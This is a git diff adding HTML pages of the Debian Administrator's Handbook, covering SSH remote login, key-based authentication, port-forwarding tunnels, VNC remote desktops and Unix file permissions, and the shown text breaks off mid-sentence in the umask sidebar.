+                    xmlns=""
+                    id="sect.ssh"></a>9.2.1. Secure Remote Login: SSH</h3></div></div></div><a
+            id="id-1.12.5.6.2"
+            class="indexterm"></a><a
+            id="id-1.12.5.6.3"
+            class="indexterm"></a><div
+            class="para">
+				The <span
+              class="emphasis"><em>SSH</em></span> (Secure SHell) protocol was designed with security and reliability in mind. Connections using SSH are secure: the partner is authenticated and all data exchanges are encrypted.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Telnet and RSH are obsolete</strong></p></div></div></div><a
+              id="id-1.12.5.6.5.2"
+              class="indexterm"></a><a
+              id="id-1.12.5.6.5.3"
+              class="indexterm"></a><div
+              class="para">
+				Before SSH, <span
+                class="emphasis"><em>Telnet</em></span> and <span
+                class="emphasis"><em>RSH</em></span> were the main tools used to login remotely. They are now largely obsolete and should no longer be used even if Debian still provides them.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Authentication, encryption</strong></p></div></div></div><div
+              class="para">
+				When you need to give a client the ability to conduct or trigger actions on a server, security is important. You must ensure the identity of the client; this is authentication. This identity usually consists of a password that must be kept secret, or any other client could get the password. This is the purpose of encryption, which is a form of encoding that allows two systems to communicate confidential information on a public channel while protecting it from being readable to others.
+			</div><div
+              class="para">
+				Authentication and encryption are often mentioned together, both because they are frequently used together, and because they are usually implemented with similar mathematical concepts.
+			</div></div><div
+            class="para">
+				SSH also offers two file transfer services. <code
+              class="command">scp</code> is a command line tool that can be used like <code
+              class="command">cp</code>, except that any path to another machine is prefixed with the machine's name, followed by a colon.
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>scp file machine:/tmp/</code></strong></pre><div
+            class="para">
+				<code
+              class="command">sftp</code> is an interactive command, similar to <code
+              class="command">ftp</code>. In a single session, <code
+              class="command">sftp</code> can transfer several files, and it is possible to manipulate remote files with it (delete, rename, change permissions, etc.).
+			</div><a
+            id="id-1.12.5.6.10"
+            class="indexterm"></a><a
+            id="id-1.12.5.6.11"
+            class="indexterm"></a><div
+            class="para">
+				Debian uses OpenSSH, a free version of SSH maintained by the <code
+              class="command">OpenBSD</code> project (a free operating system based on the BSD kernel, focused on security) and fork of the original SSH software developed by the SSH Communications Security Corp company, of Finland. This company initially developed SSH as free software, but eventually decided to continue its development under a proprietary license. The OpenBSD project then created OpenSSH to maintain a free version of SSH.
+			</div><a
+            id="id-1.12.5.6.13"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> <span
+                        class="foreignphrase"><em
+                          class="foreignphrase">Fork</em></span></strong></p></div></div></div><a
+              id="id-1.12.5.6.14.2"
+              class="indexterm"></a><div
+              class="para">
+				A “fork”, in the software field, means a new project that starts as a clone of an existing project, and that will compete with it. From there on, both software will usually quickly diverge in terms of new developments. A fork is often the result of disagreements within the development team.
+			</div><div
+              class="para">
+				The option to fork a project is a direct result of the very nature of free software; a fork is a healthy event when it enables the continuation of a project as free software (for example in case of license changes). A fork arising from technical or personal disagreements is often a waste of human resources; another resolution would be preferable. Mergers of two projects that previously went through a prior fork are not unheard of.
+			</div></div><div
+            class="para">
+				OpenSSH is split into two packages: the client part is in the <span
+              class="pkg pkg">openssh-client</span> package, and the server is in the <span
+              class="pkg pkg">openssh-server</span> package. The <span
+              class="pkg pkg">ssh</span> meta-package depends on both parts and facilitates installation of both (<code
+              class="command">apt install ssh</code>).
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ssh-key-based-auth"></a>9.2.1.1. Key-Based Authentication</h4></div></div></div><div
+              class="para">
+					Each time someone logs in over SSH, the remote server asks for a password to authenticate the user. This can be problematic if you want to automate a connection, or if you use a tool that requires frequent connections over SSH. This is why SSH offers a key-based authentication system.
+				</div><div
+              class="para">
+					The user generates a key pair on the client machine with <code
+                class="command">ssh-keygen -t rsa</code>; the public key is stored in <code
+                class="filename">~/.ssh/id_rsa.pub</code>, while the corresponding private key is stored in <code
+                class="filename">~/.ssh/id_rsa</code>. The user then uses <code
+                class="command">ssh-copy-id <em
+                  class="replaceable">server</em></code> to add their public key to the <code
+                class="filename">~/.ssh/authorized_keys</code> file on the server. If the private key was not protected with a “passphrase” at the time of its creation, all subsequent logins on the server will work without a password. Otherwise, the private key must be decrypted each time by entering the passphrase. Fortunately, <code
+                class="command">ssh-agent</code> allows us to keep private keys in memory to not have to regularly re-enter the password. For this, you simply use <code
+                class="command">ssh-add</code> (once per work session) provided that the session is already associated with a functional instance of <code
+                class="command">ssh-agent</code>. Debian activates it by default in graphical sessions, but this can be deactivated by changing <code
+                class="filename">/etc/X11/Xsession.options</code>. For a console session, you can manually start it with <code
+                class="command">eval $(ssh-agent)</code>.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> Protection of the private key</strong></p></div></div></div><div
+                class="para">
+					Whoever has the private key can login on the account thus configured. This is why access to the private key is protected by a “passphrase”. Someone who acquires a copy of a private key file (for example, <code
+                  class="filename">~/.ssh/id_rsa</code>) still has to know this phrase in order to be able to use it. This additional protection is not, however, impregnable, and if you think that this file has been compromised, it is best to disable that key on the computers in which it has been installed (by removing it from the <code
+                  class="filename">authorized_keys</code> files) and replacing it with a newly generated key.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> OpenSSL flaw in Debian <span
+                          class="distribution distribution">Etch</span></strong></p></div></div></div><div
+                class="para">
+					The OpenSSL library, as initially provided in Debian <span
+                  class="distribution distribution">Etch</span>, had a serious problem in its random number generator (RNG). Indeed, the Debian maintainer had made a change so that applications using it would no longer generate warnings when analyzed by memory testing tools like <code
+                  class="command">valgrind</code>. Unfortunately, this change also meant that the RNG was employing only one source of entropy corresponding to the process number (PID) whose 32,000 possible values do not offer enough randomness. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://www.debian.org/security/2008/dsa-1571">http://www.debian.org/security/2008/dsa-1571</a></div>
+				</div><div
+                class="para">
+					Specifically, whenever OpenSSL was used to generate a key, it always produced a key within a known set of hundreds of thousands of keys (32,000 multiplied by a small number of key lengths). This affected SSH keys, SSL keys, and X.509 certificates used by numerous applications, such as OpenVPN. A cracker had only to try all of the keys to gain unauthorized access. To reduce the impact of the problem, the SSH daemon was modified to refuse problematic keys that are listed in the <span
+                  class="pkg pkg">openssh-blacklist</span> and <span
+                  class="pkg pkg">openssh-blacklist-extra</span> packages. Additionally, the <code
+                  class="command">ssh-vulnkey</code> command allows identification of possibly compromised keys in the system.
+				</div><div
+                class="para">
+					A more thorough analysis of this incident brings to light that it is the result of multiple (small) problems, both within the OpenSSL project and with the Debian package maintainer. A widely used library like OpenSSL should — without modifications — not generate warnings when tested by <code
+                  class="command">valgrind</code>. Furthermore, the code (especially the parts as sensitive as the RNG) should be better commented to prevent such errors. On Debian's side, the maintainer wanted to validate the modifications with the OpenSSL developers, but simply explained the modifications without providing the corresponding patch to review and failed to mention his role within Debian. Finally, the maintenance choices were sub-optimal: the changes made to the original code were not clearly documented; all the modifications were effectively stored in a Subversion repository, but they ended up all lumped into one single patch during creation of the source package.
+				</div><div
+                class="para">
+					It is difficult under such conditions to find the corrective measures to prevent such incidents from recurring. The lesson to be learned here is that every divergence Debian introduces to upstream software must be justified, documented, submitted to the upstream project when possible, and widely publicized. It is from this perspective that the new source package format (“3.0 (quilt)”) and the Debian sources webservice were developed. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://sources.debian.org">http://sources.debian.org</a></div>
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ssh-x11"></a>9.2.1.2. Using Remote X11 Applications</h4></div></div></div><div
+              class="para">
+					The SSH protocol allows forwarding of graphical data (“X11” session, from the name of the most widespread graphical system in Unix); the server then keeps a dedicated channel for those data. Specifically, a graphical program executed remotely can be displayed on the X.org server of the local screen, and the whole session (input and display) will be secure. Since this feature allows remote applications to interfere with the local system, it is disabled by default. You can enable it by specifying <code
+                class="literal">X11Forwarding yes</code> in the server configuration file (<code
+                class="filename">/etc/ssh/sshd_config</code>). Finally, the user must also request it by adding the <code
+                class="literal">-X</code> option to the <code
+                class="command">ssh</code> command-line.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.ssh-port-forwarding"></a>9.2.1.3. Creating Encrypted Tunnels with Port Forwarding</h4></div></div></div><a
+              id="id-1.12.5.6.18.2"
+              class="indexterm"></a><div
+              class="para">
+					Its <code
+                class="literal">-R</code> and <code
+                class="literal">-L</code> options allow <code
+                class="command">ssh</code> to create “encrypted tunnels” between two machines, securely forwarding a local TCP port (see sidebar <a
+                class="xref"
+                href="network-infrastructure.html#sidebar.tcp-udp"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> TCP/UDP</a>) to a remote machine or vice versa.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Tunnel</strong></p></div></div></div><a
+                id="id-1.12.5.6.18.4.2"
+                class="indexterm"></a><a
+                id="id-1.12.5.6.18.4.3"
+                class="indexterm"></a><div
+                class="para">
+					The Internet, and most LANs that are connected to it, operate in packet mode and not in connected mode, meaning that a packet issued from one computer to another is going to be stopped at several intermediary routers to find its way to its destination. You can still simulate a connected operation where the stream is encapsulated in normal IP packets. These packets follow their usual route, but the stream is reconstructed unchanged at the destination. We call this a “tunnel”, analogous to a road tunnel in which vehicles drive directly from the entrance (input) to the exit (output) without encountering any intersections, as opposed to a path on the surface that would involve intersections and changing direction.
+				</div><div
+                class="para">
+					You can use this opportunity to add encryption to the tunnel: the stream that flows through it is then unrecognizable from the outside, but it is returned in decrypted form at the exit of the tunnel.
+				</div></div><div
+              class="para">
+					<code
+                class="command">ssh -L 8000:server:25 intermediary</code> establishes an SSH session with the <em
+                class="replaceable">intermediary</em> host and listens to local port 8000 (see <a
+                class="xref"
+                href="sect.remote-login.html#figure.ssh-L">9.3 – „Forwarding a local port with SSH“</a>). For any connection established on this port, <code
+                class="command">ssh</code> will initiate a connection from the <em
+                class="replaceable">intermediary</em> computer to port 25 on the <em
+                class="replaceable">server</em>, and will bind both connections together.
+				</div><div
+              class="para">
+					<code
+                class="command">ssh -R 8000:server:25 intermediary</code> also establishes an SSH session to the <em
+                class="replaceable">intermediary</em> computer, but it is on this machine that <code
+                class="command">ssh</code> listens to port 8000 (see <a
+                class="xref"
+                href="sect.remote-login.html#figure.ssh-R">9.4 – „Forwarding a remote port with SSH“</a>). Any connection established on this port will cause <code
+                class="command">ssh</code> to open a connection from the local machine on to port 25 of the <em
+                class="replaceable">server</em>, and to bind both connections together.
+				</div><div
+              class="para">
+					In both cases, connections are made to port 25 on the <em
+                class="replaceable">server</em> host, which pass through the SSH tunnel established between the local machine and the <em
+                class="replaceable">intermediary</em> machine. In the first case, the entrance to the tunnel is local port 8000, and the data move towards the <em
+                class="replaceable">intermediary</em> machine before being directed to the <em
+                class="replaceable">server</em> on the “public” network. In the second case, the input and output in the tunnel are reversed; the entrance is port 8000 on the <em
+                class="replaceable">intermediary</em> machine, the output is on the local host, and the data are then directed to the <em
+                class="replaceable">server</em>. In practice, the server is usually either the local machine or the intermediary. That way SSH secures the connection from one end to the other.
+				</div><div
+              class="figure"><a
+                xmlns=""
+                id="figure.ssh-L"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/ssh-L.png"
+                    alt="Forwarding a local port with SSH" /></div></div><p
+                class="title"><strong>Obrázek 9.3. Forwarding a local port with SSH</strong></p></div><div
+              class="figure"><a
+                xmlns=""
+                id="figure.ssh-R"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/ssh-R.png"
+                    alt="Forwarding a remote port with SSH" /></div></div><p
+                class="title"><strong>Obrázek 9.4. Forwarding a remote port with SSH</strong></p></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.remote-desktops"></a>9.2.2. Using Remote Graphical Desktops</h3></div></div></div><div
+            class="para">
+				VNC (Virtual Network Computing) allows remote access to graphical desktops.
+			</div><a
+            id="id-1.12.5.7.3"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.4"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.5"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.6"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.7"
+            class="indexterm"></a><div
+            class="para">
+				This tool is mostly used for technical assistance; the administrator can see the errors that the user is facing, and show them the correct course of action without having to stand by them.
+			</div><a
+            id="id-1.12.5.7.9"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.10"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.11"
+            class="indexterm"></a><div
+            class="para">
+				First, the user must authorize sharing their session. The GNOME graphical desktop environment in <span
+              class="distribution distribution">Jessie</span> includes that option in its configuration panel (contrary to previous versions of Debian, where the user had to install and run <code
+              class="command">vino</code>). KDE Plasma still requires using <code
+              class="command">krfb</code> to allow sharing an existing session over VNC. For other graphical desktop environments, the <code
+              class="command">x11vnc</code> command (from the Debian package of the same name) serves the same purpose; you can make it available to the user with an explicit icon.
+			</div><a
+            id="id-1.12.5.7.13"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.14"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.15"
+            class="indexterm"></a><a
+            id="id-1.12.5.7.16"
+            class="indexterm"></a><div
+            class="para">
+				When the graphical session is made available by VNC, the administrator must connect to it with a VNC client. GNOME has <code
+              class="command">vinagre</code> and <code
+              class="command">remmina</code> for that, while the KDE project provides <code
+              class="command">krdc</code> (in the menu at <span
+              class="guimenu"><strong>K</strong></span> → <span
+              class="guisubmenu"><strong>Internet</strong></span> → <span
+              class="guimenuitem"><strong>Remote Desktop Client</strong></span>). There are other VNC clients that use the command line, such as <code
+              class="command">xvnc4viewer</code> in the Debian package of the same name. Once connected, the administrator can see what is going on, work on the machine remotely, and show the user how to proceed.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> VNC over SSH</strong></p></div></div></div><a
+              id="id-1.12.5.7.18.2"
+              class="indexterm"></a><div
+              class="para">
+				If you want to connect by VNC, and you don't want your data sent in clear text on the network, it is possible to encapsulate the data in an SSH tunnel (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.ssh-port-forwarding">9.2.1.3 – „Creating Encrypted Tunnels with Port Forwarding“</a>). You simply have to know that VNC uses port 5900 by default for the first screen (called “localhost:0”), 5901 for the second (called “localhost:1”), etc.
+			</div><div
+              class="para">
+				The <code
+                class="command">ssh -L localhost:5901:localhost:5900 -N -T <em
+                  class="replaceable">machine</em></code> command creates a tunnel between local port 5901 in the localhost interface and port 5900 of the <em
+                class="replaceable">machine</em> host. The first “localhost” restricts SSH to listening to only that interface on the local machine. The second “localhost” indicates the interface on the remote machine which will receive the network traffic entering in “localhost:5901”. Thus <code
+                class="command">vncviewer localhost:1</code> will connect the VNC client to the remote screen, even though you indicate the name of the local machine.
+			</div><div
+              class="para">
+				When the VNC session is closed, remember to close the tunnel by also quitting the corresponding SSH session.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Display manager</strong></p></div></div></div><a
+              id="id-1.12.5.7.19.2"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.3"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.4"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.5"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.6"
+              class="indexterm"></a><a
+              id="id-1.12.5.7.19.7"
+              class="indexterm"></a><div
+              class="para">
+				<code
+                class="command">gdm3</code>, <code
+                class="command">kdm</code>, <code
+                class="command">lightdm</code>, and <code
+                class="command">xdm</code> are Display Managers. They take control of the graphical interface shortly after boot in order to provide the user a login screen. Once the user has logged in, they execute the programs needed to start a graphical work session.
+			</div></div><div
+            class="para">
+				VNC also works for mobile users, or company executives, who occasionally need to login from their home to access a remote desktop similar to the one they use at work. The configuration of such a service is more complicated: you first install the <span
+              class="pkg pkg">vnc4server</span> package, change the configuration of the display manager to accept <code
+              class="literal">XDMCP Query</code> requests (for <code
+              class="command">gdm3</code>, this can be done by adding <code
+              class="literal">Enable=true</code> in the “xdmcp” section of <code
+              class="filename">/etc/gdm3/daemon.conf</code>), and finally, start the VNC server with <code
+              class="command">inetd</code> so that a session is automatically started when a user tries to login. For example, you may add this line to <code
+              class="filename">/etc/inetd.conf</code>:
+			</div><pre
+            class="programlisting">5950  stream  tcp  nowait  nobody.tty  /usr/bin/Xvnc Xvnc -inetd -query localhost -once -geometry 1024x768 -depth 16 securitytypes=none
+</pre><div
+            class="para">
+				Redirecting incoming connections to the display manager solves the problem of authentication, because only users with local accounts will pass the <code
+              class="command">gdm3</code> login screen (or equivalent <code
+              class="command">kdm</code>, <code
+              class="command">xdm</code>, etc.). As this operation allows multiple simultaneous logins without any problem (provided the server is powerful enough), it can even be used to provide complete desktops for mobile users (or for less powerful desktop systems, configured as thin clients). Users simply login to the server's screen with <code
+              class="command">vncviewer <em
+                class="replaceable">server</em>:50</code>, because the port used is 5950.
+			</div><a
+            id="id-1.12.5.7.23"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="unix-services.html"><strong>Předcházející</strong>Kapitola 9. Unix Services</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rights-management.html"><strong>Další</strong>9.3. Managing Rights</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html
new file mode 100644
index 000000000..c2b87043c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.rights-management.html
@@ -0,0 +1,309 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.3. Managing Rights</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.remote-login.html"
+        title="9.2. Remote Login" /><link
+        rel="next"
+        href="sect.administration-interfaces.html"
+        title="9.4. Administration Interfaces" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.rights-management.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.remote-login.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.administration-interfaces.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.rights-management"></a>9.3. Managing Rights</h2></div></div></div><div
+          class="para">
+			Linux is definitely a multi-user system, so it is necessary to provide a permission system to control the set of authorized operations on files and directories, which includes all the system resources and devices (on a Unix system, any device is represented by a file or directory). This principle is common to all Unix systems, but a reminder is always useful, especially as there are some interesting and relatively unknown advanced uses.
+		</div><a
+          id="id-1.12.6.3"
+          class="indexterm"></a><a
+          id="id-1.12.6.4"
+          class="indexterm"></a><a
+          id="id-1.12.6.5"
+          class="indexterm"></a><a
+          id="id-1.12.6.6"
+          class="indexterm"></a><a
+          id="id-1.12.6.7"
+          class="indexterm"></a><a
+          id="id-1.12.6.8"
+          class="indexterm"></a><div
+          class="para">
+			Each file or directory has specific permissions for three categories of users:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					its owner (symbolized by <code
+                  class="literal">u</code> as in “user”);
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					its owner group (symbolized by <code
+                  class="literal">g</code> as in “group”), representing all the members of the group;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					the others (symbolized by <code
+                  class="literal">o</code> as in “other”).
+				</div></li></ul></div><div
+          class="para">
+			Three types of rights can be combined:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					reading (symbolized by <code
+                  class="literal">r</code> as in “read”);
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					writing (or modifying, symbolized by <code
+                  class="literal">w</code> as in “write”);
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					executing (symbolized by <code
+                  class="literal">x</code> as in “eXecute”).
+				</div></li></ul></div><a
+          id="id-1.12.6.13"
+          class="indexterm"></a><a
+          id="id-1.12.6.14"
+          class="indexterm"></a><a
+          id="id-1.12.6.15"
+          class="indexterm"></a><a
+          id="id-1.12.6.16"
+          class="indexterm"></a><div
+          class="para">
+			In the case of a file, these rights are easily understood: read access allows reading the content (including copying), write access allows changing it, and execute access allows you to run it (which will only work if it is a program).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> <code
+                      class="literal">setuid</code> and <code
+                      class="literal">setgid</code> executables</strong></p></div></div></div><div
+            class="para">
+			Two particular rights are relevant to executable files: <code
+              class="literal">setuid</code> and <code
+              class="literal">setgid</code> (symbolized with the letter “s”). Note that we frequently speak of “bit”, since each of these boolean values can be represented by a 0 or a 1. These two rights allow any user to execute the program with the rights of the owner or the group, respectively. This mechanism grants access to features requiring higher level permissions than those you would usually have.
+		</div><a
+            id="id-1.12.6.18.3"
+            class="indexterm"></a><a
+            id="id-1.12.6.18.4"
+            class="indexterm"></a><div
+            class="para">
+			Since a <code
+              class="literal">setuid</code> root program is systematically run under the super-user identity, it is very important to ensure it is secure and reliable. Indeed, a user who would manage to subvert it to call a command of their choice could then impersonate the root user and have all rights on the system.
+		</div></div><div
+          class="para">
+			A directory is handled differently. Read access gives the right to consult the list of its entries (files and directories), write access allows creating or deleting files, and execute access allows crossing through it (especially to go there with the <code
+            class="command">cd</code> command). Being able to cross through a directory without being able to read it gives permission to access the entries therein that are known by name, but not to find them if you do not know their existence or their exact name.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.setgid-dir"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> <code
+                      class="literal">setgid</code> directory and <span
+                      class="emphasis"><em>sticky bit</em></span></strong></p></div></div></div><a
+            id="id-1.12.6.20.2"
+            class="indexterm"></a><div
+            class="para">
+			The <code
+              class="literal">setgid</code> bit also applies to directories. Any newly-created item in such directories is automatically assigned the owner group of the parent directory, instead of inheriting the creator's main group as usual. This setup avoids the user having to change its main group (with the <code
+              class="command">newgrp</code> command) when working in a file tree shared between several users of the same dedicated group.
+		</div><a
+            id="id-1.12.6.20.4"
+            class="indexterm"></a><div
+            class="para">
+			The “sticky” bit (symbolized by the letter “t”) is a permission that is only useful in directories. It is especially used for temporary directories where everybody has write access (such as <code
+              class="filename">/tmp/</code>): it restricts deletion of files so that only their owner (or the owner of the parent directory) can do it. Lacking this, everyone could delete other users' files in <code
+              class="filename">/tmp/</code>.
+		</div></div><div
+          class="para">
+			Three commands control the permissions associated with a file:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">chown <em
+                    class="replaceable">user</em> <em
+                    class="replaceable">file</em></code> changes the owner of the file;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">chgrp <em
+                    class="replaceable">group</em> <em
+                    class="replaceable">file</em></code> alters the owner group;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">chmod <em
+                    class="replaceable">rights</em> <em
+                    class="replaceable">file</em></code> changes the permissions for the file.
+				</div></li></ul></div><div
+          class="para">
+			There are two ways of presenting rights. Among them, the symbolic representation is probably the easiest to understand and remember. It involves the letter symbols mentioned above. You can define rights for each category of users (<code
+            class="literal">u</code>/<code
+            class="literal">g</code>/<code
+            class="literal">o</code>), by setting them explicitly (with <code
+            class="literal">=</code>), by adding (<code
+            class="literal">+</code>), or subtracting (<code
+            class="literal">-</code>). Thus the <code
+            class="literal">u=rwx,g+rw,o-r</code> formula gives the owner read, write, and execute rights, adds read and write rights for the owner group, and removes read rights for other users. Rights not altered by the addition or subtraction in such a command remain unmodified. The letter <code
+            class="literal">a</code>, for “all”, covers all three categories of users, so that <code
+            class="literal">a=rx</code> grants all three categories the same rights (read and execute, but not write).
+		</div><a
+          id="id-1.12.6.24"
+          class="indexterm"></a><a
+          id="id-1.12.6.25"
+          class="indexterm"></a><a
+          id="id-1.12.6.26"
+          class="indexterm"></a><a
+          id="id-1.12.6.27"
+          class="indexterm"></a><a
+          id="id-1.12.6.28"
+          class="indexterm"></a><div
+          class="para">
+			The (octal) numeric representation associates each right with a value: 4 for read, 2 for write, and 1 for execute. We associate each combination of rights with the sum of the figures. Each value is then assigned to different categories of users by putting them end to end in the usual order (owner, group, others).
+		</div><div
+          class="para">
+			For instance, the <code
+            class="command">chmod 754 <em
+              class="replaceable">file</em></code> command will set the following rights: read, write and execute for the owner (since 7 = 4 + 2 + 1); read and execute for the group (since 5 = 4 + 1); read-only for others. The <code
+            class="literal">0</code> means no rights; thus <code
+            class="command">chmod 600 <em
+              class="replaceable">file</em></code> allows for read/write rights for the owner, and no rights for anyone else. The most frequent right combinations are <code
+            class="literal">755</code> for executable files and directories, and <code
+            class="literal">644</code> for data files.
+		</div><div
+          class="para">
+			To represent special rights, you can prefix a fourth digit to this number according to the same principle, where the <code
+            class="literal">setuid</code>, <code
+            class="literal">setgid</code> and <code
+            class="literal">sticky</code> bits are 4, 2 and 1, respectively. <code
+            class="command">chmod 4754</code> will associate the <code
+            class="literal">setuid</code> bit with the previously described rights.
+		</div><div
+          class="para">
+			Note that the use of octal notation only allows to set all the rights at once on a file; you cannot use it to simply add a new right, such as read access for the group owner, since you must take into account the existing rights and compute the new corresponding numerical value.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Recursive operation</strong></p></div></div></div><div
+            class="para">
+			Sometimes we have to change rights for an entire file tree. All the commands above have a <code
+              class="literal">-R</code> option to operate recursively in sub-directories.
+		</div><div
+            class="para">
+			The distinction between directories and files sometimes causes problems with recursive operations. That is why the “X” letter has been introduced in the symbolic representation of rights. It represents a right to execute which applies only to directories (and not to files lacking this right). Thus, <code
+              class="command">chmod -R a+X <em
+                class="replaceable">directory</em></code> will only add execute rights for all categories of users (<code
+              class="literal">a</code>) for all of the sub-directories and files for which at least one category of user (even if their sole owner) already has execute rights.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Changing the user and group</strong></p></div></div></div><div
+            class="para">
+			Frequently you want to change the group of a file at the same time that you change the owner. The <code
+              class="command">chown</code> command has a special syntax for that: <code
+              class="command">chown <em
+                class="replaceable">user</em>:<em
+                class="replaceable">group</em> <em
+                class="replaceable">file</em></code>
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> <code
+                      class="command">umask</code></strong></p></div></div></div><div
+            class="para">
+			When an application creates a file, it assigns indicative permissions, knowing that the system automatically removes certain rights, given by the command <code
+              class="command">umask</code>. Enter <code
